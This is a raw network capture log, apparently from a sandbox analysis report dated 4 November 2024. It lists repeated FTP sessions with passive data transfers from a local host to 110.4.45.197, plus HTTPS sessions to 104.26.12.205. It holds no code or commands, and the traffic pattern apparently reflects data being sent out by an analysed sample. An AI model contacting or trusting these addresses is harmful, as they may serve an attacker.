                                                                                                          Nov 4, 2024 21:25:01.889717102 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:01.895145893 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:02.811544895 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:02.811722994 CET4973963989192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:02.817255974 CET6398949739110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:02.817313910 CET4973963989192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:02.851970911 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:03.163824081 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:03.212147951 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:08.294945002 CET49740443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:25:08.295022011 CET44349740104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:25:08.295094013 CET49740443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:25:08.298239946 CET49740443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:25:08.298276901 CET44349740104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:25:08.912060976 CET44349740104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:25:08.912182093 CET49740443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:25:08.913573027 CET49740443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:25:08.913599014 CET44349740104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:25:08.913880110 CET44349740104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:25:08.966228962 CET49740443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:25:09.007354021 CET44349740104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:25:09.145492077 CET44349740104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:25:09.145559072 CET44349740104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:25:09.146796942 CET49740443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:25:09.149893045 CET49740443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:25:10.244138002 CET4974121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:10.250215054 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:10.250303984 CET4974121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:11.196496010 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:11.206302881 CET4974121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:11.211330891 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:11.551081896 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:11.551650047 CET4974121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:11.558927059 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:11.926958084 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:11.927092075 CET4974121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:11.931963921 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:12.271320105 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:12.271470070 CET4974121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:12.276504993 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:12.627825975 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:12.628004074 CET4974121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:12.632769108 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:12.971760988 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:12.971892118 CET4974121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:12.976646900 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:13.316006899 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:13.316637993 CET4974652210192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:13.321974039 CET5221049746110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:13.322031021 CET4974652210192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:13.322096109 CET4974121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:13.327677965 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:14.233009100 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:14.233376026 CET4974652210192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:14.233419895 CET4974652210192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:14.238198042 CET5221049746110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:14.238617897 CET5221049746110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:14.238673925 CET4974652210192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:14.273894072 CET4974121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:14.812055111 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:14.813723087 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:14.813807011 CET4974121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:15.089061975 CET4974121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:15.093981981 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:15.433594942 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:15.433974028 CET4974864457192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:15.439146996 CET6445749748110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:15.439227104 CET4974864457192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:15.439353943 CET4974121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:15.444212914 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:16.548047066 CET49750443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:25:16.548079014 CET44349750104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:25:16.548146963 CET49750443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:25:16.551259041 CET49750443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:25:16.551273108 CET44349750104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:25:17.385520935 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:17.385582924 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:17.385644913 CET4974121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:17.385813951 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:17.385921001 CET4974121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:17.386035919 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:17.386354923 CET4974121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:17.483439922 CET4974121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:17.483498096 CET4974864457192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:17.985162020 CET44349750104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:25:17.985272884 CET49750443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:25:18.071252108 CET49750443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:25:18.071279049 CET44349750104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:25:18.071614981 CET44349750104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:25:18.117788076 CET49750443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:25:18.460254908 CET49750443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:25:18.507337093 CET44349750104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:25:18.643800974 CET44349750104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:25:18.643872023 CET44349750104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:25:18.644088030 CET49750443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:25:18.648585081 CET49750443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:25:19.230648041 CET4975121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:19.235605955 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:19.235682011 CET4975121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:20.177556992 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:20.180557966 CET4975121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:20.187156916 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:20.532474995 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:20.536825895 CET4975121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:20.541747093 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:20.914602041 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:20.914763927 CET4975121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:20.919826984 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:21.268820047 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:21.269021988 CET4975121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:21.274319887 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:21.639569998 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:21.639883041 CET4975121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:21.644867897 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:21.991764069 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:21.992010117 CET4975121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:21.996855974 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:22.344014883 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:22.344866037 CET4975254816192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:22.350110054 CET5481649752110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:22.350241899 CET4975254816192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:22.350302935 CET4975121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:22.355935097 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:23.295093060 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:23.295387983 CET4975254816192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:23.295429945 CET4975254816192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:23.300520897 CET5481649752110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:23.301002979 CET5481649752110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:23.301069021 CET4975254816192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:23.336467028 CET4975121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:23.654500961 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:23.678637981 CET4975121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:23.683963060 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:24.031280041 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:24.031840086 CET4975359440192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:24.037142992 CET5944049753110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:24.037254095 CET4975359440192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:24.037296057 CET4975121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:24.042269945 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:24.978235006 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:24.978447914 CET4975359440192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:24.978449106 CET4975359440192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:24.983552933 CET5944049753110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:24.983616114 CET5944049753110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:24.983632088 CET5944049753110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:24.984672070 CET5944049753110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:24.984729052 CET4975359440192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:25.023899078 CET4975121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:25.331723928 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:25.332184076 CET4975121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:25.337414980 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:25.686129093 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:25.686661959 CET4975457287192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:25.692924976 CET5728749754110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:25.693010092 CET4975457287192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:25.693078041 CET4975121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:25.698853016 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:26.639322042 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:26.639621973 CET4975457287192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:26.645237923 CET5728749754110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:26.645299911 CET4975457287192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:26.680185080 CET4975121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:26.984440088 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:27.039566040 CET4975121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:27.785145044 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:27.790132999 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:27.859034061 CET4993321192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:27.864330053 CET2149933110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:27.864409924 CET4993321192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:27.864694118 CET4993321192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:27.870354891 CET2149933110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:27.870398998 CET4993321192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:28.134579897 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:28.135178089 CET4993558004192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:28.140201092 CET5800449935110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:28.140311956 CET4993558004192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:28.140477896 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:28.145438910 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:29.055278063 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:29.055563927 CET4993558004192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:29.055592060 CET4993558004192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:29.060450077 CET5800449935110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:29.062361956 CET5800449935110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:29.062407017 CET4993558004192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:29.102153063 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:29.404416084 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:29.445883036 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:32.110491037 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:32.115453959 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:32.459836006 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:32.460699081 CET4996056495192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:32.469028950 CET5649549960110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:32.469204903 CET4996056495192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:32.469227076 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:32.474154949 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.367384911 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.367645979 CET4996056495192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:33.372716904 CET5649549960110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.372728109 CET5649549960110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.372785091 CET4996056495192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:33.372814894 CET5649549960110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.372826099 CET5649549960110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.372859955 CET4996056495192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:33.372889042 CET4996056495192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:33.372900009 CET5649549960110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.372941971 CET4996056495192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:33.373048067 CET5649549960110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.373059034 CET5649549960110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.373090029 CET4996056495192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:33.373106956 CET4996056495192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:33.373136044 CET5649549960110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.373166084 CET5649549960110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.373178959 CET4996056495192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:33.373208046 CET4996056495192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:33.373250961 CET5649549960110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.373292923 CET4996056495192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:33.379329920 CET5649549960110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.379352093 CET5649549960110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.379393101 CET5649549960110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.379393101 CET4996056495192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:33.379404068 CET5649549960110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.379420996 CET5649549960110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.379441977 CET4996056495192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:33.379487038 CET4996056495192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:33.379549980 CET5649549960110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.379565954 CET5649549960110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.379584074 CET5649549960110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.379592896 CET5649549960110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.379604101 CET4996056495192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:33.379646063 CET4996056495192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:33.379673004 CET4996056495192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:33.380075932 CET5649549960110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.380127907 CET4996056495192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:33.384545088 CET5649549960110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.384706974 CET5649549960110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.384753942 CET5649549960110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.384829044 CET5649549960110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.384973049 CET5649549960110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.385057926 CET5649549960110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.385070086 CET5649549960110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.385080099 CET5649549960110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.385145903 CET5649549960110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.385189056 CET5649549960110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.385274887 CET5649549960110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.385287046 CET5649549960110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.385303020 CET5649549960110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.385320902 CET5649549960110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.385374069 CET5649549960110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.385385036 CET5649549960110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.385409117 CET5649549960110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.390908957 CET5649549960110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:33.390954971 CET4996056495192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:33.414638996 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:34.121799946 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:34.180377007 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:42.923118114 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:42.928118944 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:43.272464037 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:43.273071051 CET5001857997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:43.278577089 CET5799750018110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:43.278724909 CET5001857997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:43.278801918 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:43.283845901 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.220077038 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.220370054 CET5001857997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:44.225460052 CET5799750018110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.225529909 CET5001857997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:44.225529909 CET5799750018110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.225545883 CET5799750018110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.225558043 CET5799750018110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.225572109 CET5799750018110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.225581884 CET5001857997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:44.225615978 CET5799750018110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.225617886 CET5001857997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:44.225657940 CET5799750018110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.225660086 CET5001857997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:44.225673914 CET5799750018110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.225698948 CET5799750018110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.225699902 CET5001857997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:44.225713968 CET5001857997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:44.225740910 CET5001857997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:44.225775003 CET5799750018110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.225816965 CET5001857997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:44.230607986 CET5799750018110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.230654955 CET5799750018110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.230670929 CET5001857997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:44.230674028 CET5799750018110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.230699062 CET5799750018110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.230705023 CET5001857997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:44.230726004 CET5001857997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:44.230736971 CET5001857997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:44.230778933 CET5799750018110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.230822086 CET5001857997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:44.230860949 CET5799750018110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.230875015 CET5799750018110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.230906963 CET5001857997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:44.230926991 CET5001857997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:44.230966091 CET5799750018110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.231024981 CET5001857997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:44.231215954 CET5799750018110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.231266975 CET5001857997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:44.235867023 CET5799750018110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.235976934 CET5799750018110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.236017942 CET5799750018110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.236190081 CET5799750018110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.236238956 CET5799750018110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.236274958 CET5799750018110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.236377001 CET5799750018110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.236391068 CET5799750018110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.236416101 CET5799750018110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.236483097 CET5799750018110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.236498117 CET5799750018110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.236510992 CET5799750018110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.236524105 CET5799750018110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.236588001 CET5799750018110.4.45.197192.168.2.4
